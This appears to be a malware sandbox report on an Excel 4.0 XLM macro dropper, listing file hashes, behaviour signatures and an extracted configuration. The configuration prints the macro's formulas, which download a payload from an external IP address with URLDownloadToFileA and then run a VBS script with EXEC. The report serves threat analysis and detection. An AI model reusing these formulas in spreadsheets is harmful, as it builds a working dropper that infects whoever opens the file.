General

  • Target

    286c28e6219d609162a753d5bb6586d6

  • Size

    6KB

  • Sample

    231221-3my4dsbdfp

  • MD5

    286c28e6219d609162a753d5bb6586d6

  • SHA1

    adfb68e16213829c0a66abf5ee44d707c1e1609e

  • SHA256

    b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7

  • SHA512

    0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a

  • SSDEEP

    192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    • Target

      286c28e6219d609162a753d5bb6586d6

    • Size

      6KB

    • MD5

      286c28e6219d609162a753d5bb6586d6

    • SHA1

      adfb68e16213829c0a66abf5ee44d707c1e1609e

    • SHA256

      b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7

    • SHA512

      0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a

    • SSDEEP

      192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks